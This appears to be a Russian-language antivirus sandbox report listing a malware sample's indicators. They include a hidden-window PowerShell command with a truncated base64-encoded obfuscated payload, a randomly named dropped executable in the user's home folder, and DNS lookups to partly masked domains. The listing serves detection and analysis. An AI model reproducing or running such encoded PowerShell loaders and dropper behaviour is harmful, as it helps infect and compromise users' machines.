Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAOABQADQAdgBjAHUAIAA9ACAAIABbAHQAeQBQAGUAXQAoACIAewA1AH0AewAyAH0AewAwAH0AewAzAH0AewAxAH0AewA0AH0AIgAgAC0AZgAgACcATQAuAGkAJwAsACcATwAnACwAJwB5AHMAdABlACcALAAnAE8ALg...
- %HOMEPATH%\nscs8ry\s9t4g_l\epl6_wa2m.exe
- %HOMEPATH%\nscs8ry\s9t4g_l\epl6_wa2m.exe
- http://go####rbwebmart.com/
- DNS ASK en#####lifecheryl.com
- DNS ASK ho####tchamelia.com
- DNS ASK se######emunicipality.org
- DNS ASK im####ectdream.com
- DNS ASK ma###ycafe.net
- DNS ASK go####rbwebmart.com
- DNS ASK 42###tracts.ca
- DNS ASK ca####palacett.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAOABQADQAdgBjAHUAIAA9ACAAIABbAHQAeQBQAGUAXQAoACIAewA1AH0AewAyAH0AewAwAH0AewAzAH0AewAxAH0AewA0AH0AIgAgAC0AZgAgACcATQAuAGkAJwAsACcATwAnACwAJwB5AHMAdABlACcALAAnAE8ALg...' (со скрытым окном)